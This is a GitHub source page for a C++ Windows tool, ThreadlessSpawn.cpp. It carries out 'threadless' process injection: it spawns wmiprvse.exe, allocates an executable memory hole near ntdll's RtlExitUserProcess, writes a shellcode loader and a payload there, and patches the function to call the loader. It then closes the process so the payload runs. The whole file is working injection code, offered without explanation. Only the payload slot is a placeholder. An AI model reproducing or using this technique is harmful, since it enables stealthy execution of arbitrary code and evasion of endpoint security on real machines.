-
Notifications
You must be signed in to change notification settings - Fork 4
Expand file tree
/
Copy pathThreadlessSpawn.cpp
More file actions
206 lines (169 loc) · 6.59 KB
/
ThreadlessSpawn.cpp
File metadata and controls
206 lines (169 loc) · 6.59 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
#include <stdio.h>
#include <windows.h>
#include <stdint.h>
#define CMDLINE L"c:\\windows\\system32\\wbem\\wmiprvse.exe -Embedding"
typedef struct
{
DWORD dwProcessId;
HWND hwndWindow;
} ProcessWindow;
unsigned char shellcode_loader[] = {
0x58, 0x48, 0x83, 0xE8, 0x05, 0x50, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, 0x48, 0xB9,
0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x48, 0x89, 0x08, 0x48, 0x83, 0xEC, 0x40, 0xE8, 0x11, 0x00,
0x00, 0x00, 0x48, 0x83, 0xC4, 0x40, 0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59, 0x41, 0x58, 0x5A, 0x59, 0x58, 0xFF,
0xE0, 0x90
};
/* length: 894 bytes */
unsigned char shellcode[] = "\x90\x90";
//void ConcatArrays(unsigned char* result, const unsigned char* arr1, size_t arr1Size, const unsigned char* arr2, size_t arr2Size) {
// // Copy elements from the first array
// for (size_t i = 0; i < arr1Size; ++i) {
// result[i] = arr1[i];
// }
//
// // Copy elements from the second array
// for (size_t i = 0; i < arr2Size; ++i) {
// result[arr1Size + i] = arr2[i];
// }
//}
BOOL CALLBACK EnumWindowCallBack(HWND hWnd, LPARAM lParam)
{
ProcessWindow* pProcessWindow = (ProcessWindow*)lParam;
DWORD dwProcessId;
GetWindowThreadProcessId(hWnd, &dwProcessId);
if (pProcessWindow->dwProcessId == dwProcessId)
{
pProcessWindow->hwndWindow = hWnd;
return FALSE;
}
return TRUE;
}
UINT_PTR FindMemoryHole(HANDLE hProcess, UINT_PTR exportedFunctionAddress, SIZE_T size)
{
UINT_PTR remoteAddress;
BOOL foundMemory = FALSE;
// uint64_t exportAddress = exportedFunctionAddress;
for (remoteAddress = (exportedFunctionAddress & 0xFFFFFFFFFFF70000) - 0x70000000;
remoteAddress < exportedFunctionAddress + 0x70000000;
remoteAddress += 0x10000)
{
LPVOID lpAddr = VirtualAllocEx(hProcess, (LPVOID)remoteAddress, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (lpAddr == NULL)
{
continue;
}
foundMemory = TRUE;
break;
}
if (foundMemory == TRUE)
{
printf("[*] Found Memory Hole: %p\n", remoteAddress);
return remoteAddress;
}
return 0;
}
void GenerateHook(int64_t originalInstruction)
{
*(uint64_t*)(shellcode_loader + 0x12) = originalInstruction;
printf("[+] Hook successfully placed\n");
}
int main()
{
BOOL rez = FALSE;
SIZE_T writtenBytes = 0;
//Getting the address of specific function of the DLL
printf("[*] Getting the address of RtlExitUserProcess\n");
UINT_PTR exportedFunctionAddress = (UINT_PTR)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlExitUserProcess");
if (exportedFunctionAddress == NULL)
{
printf("[-] Could not find RtlExitUserProcess in ntdll.dll\n");
return -99;
}
printf("[+] ntdll.dll!RtlExitUserProcess Address: 0x%p\n\n", exportedFunctionAddress);
// Create a Process
HWND hwndRet = NULL;
STARTUPINFOW sInfo = { 0 };
sInfo.cb = sizeof(sInfo);
PROCESS_INFORMATION pInfo = { 0 };
sInfo.dwFlags = STARTF_USESHOWWINDOW;
sInfo.wShowWindow = SW_SHOW;
printf("[*] Trying to create process to spawn\n");
if (CreateProcessW(NULL, SysAllocString(CMDLINE), NULL, NULL, FALSE, NULL, NULL, NULL, &sInfo, &pInfo))
{
ProcessWindow procwin;
procwin.dwProcessId = pInfo.dwProcessId;
procwin.hwndWindow = NULL;
WaitForInputIdle(pInfo.hProcess, 5000);
EnumWindows(EnumWindowCallBack, (LPARAM)&procwin);
if (procwin.hwndWindow)
{
hwndRet = procwin.hwndWindow;
printf("[+] Find hwnd: 0x%x\n", hwndRet);
}
//Allocating memory holes
printf("[*] Trying to find memory holes\n");
UINT_PTR memoryHoleAddress = FindMemoryHole(pInfo.hProcess, exportedFunctionAddress, sizeof(shellcode_loader) + sizeof(shellcode));
if (memoryHoleAddress == 0)
{
printf("[-] Could not find memory hole\n");
return -99;
}
// Reading content from memory address of exported function
printf("[*] Reading bytes from the memory address of RtlExitUserProcess\n");
int64_t originalBytes = *(int64_t*)exportedFunctionAddress;
printf("[+] Address %p has value = %lld\n\n", exportedFunctionAddress, originalBytes);
// Implementing the hook
printf("[*] Generating hook\n");
GenerateHook(originalBytes);
//Chaning the memory protection settings of the exported function into the calling process to RWX
printf("[*] Changing the memory protection of RtlExitUserProcess to RWX\n");
DWORD oldProtect = 0;
if (!VirtualProtectEx(pInfo.hProcess, (LPVOID)exportedFunctionAddress, 8, PAGE_EXECUTE_READWRITE, &oldProtect))
{
printf("[-] Could not change the memory protection settings\n");
return -99;
}
printf("[+] Successfully changed the memory protection settings of RtlExitUserProcess to RWX\n");
// Injecting a call instruction into the exported function
printf("[*] Trying to inject the call assembly for the exported function\n");
int callPointerAddress = (memoryHoleAddress - ((UINT_PTR)exportedFunctionAddress + 5));
unsigned char callFunctionShellcode[] = { 0xe8, 0, 0, 0, 0 };
*(int*)(callFunctionShellcode + 1) = callPointerAddress;
VirtualProtectEx(pInfo.hProcess, callFunctionShellcode, sizeof(callFunctionShellcode), PAGE_EXECUTE_READWRITE, NULL);
if (!WriteProcessMemory(pInfo.hProcess, (LPVOID)exportedFunctionAddress, callFunctionShellcode, sizeof(callFunctionShellcode), &writtenBytes))
{
printf("[-] Could redirect RtlExitUserProcess\n");
return -99;
}
printf("[+] Successfully modified RtlExitUserProcess function to call the custom shellcode\n");
// Compiling final payload and injecting the hook
unsigned char payload[sizeof(shellcode_loader) + sizeof(shellcode)];
// ConcatArrays(&payload, &shellcode_loader, sizeof(shellcode_loader), shellcode, sizeof(shellcode));
// Copy elements from the first array
for (size_t i = 0; i < sizeof(shellcode_loader); ++i) {
payload[i] = shellcode_loader[i];
}
// Copy elements from the second array
for (size_t i = 0; i < sizeof(shellcode); ++i) {
payload[sizeof(shellcode_loader) + i] = shellcode[i];
}
if (!VirtualProtectEx(pInfo.hProcess, (LPVOID)memoryHoleAddress, sizeof(payload), PAGE_READWRITE, &oldProtect))
{
printf("[-] Modifying the memory protection of the memory hole: %p before write\n", memoryHoleAddress);
return -99;
}
if (!WriteProcessMemory(pInfo.hProcess, (LPVOID)memoryHoleAddress, payload, sizeof(payload), &writtenBytes))
{
printf("[-] Writing to the memory hole address: %p\n", memoryHoleAddress);
return -99;
}
if (!VirtualProtectEx(pInfo.hProcess, (LPVOID)memoryHoleAddress, sizeof(payload), PAGE_EXECUTE_READ, &oldProtect))
{
printf("[-] Modifying the memory protection of the memory hole: %p after write\n", memoryHoleAddress);
return -99;
}
printf("\n[+] Injection successful, wait for your trigger function!\n");
Sleep(2000);
PostMessageA(hwndRet, WM_CLOSE, NULL, NULL);
}
}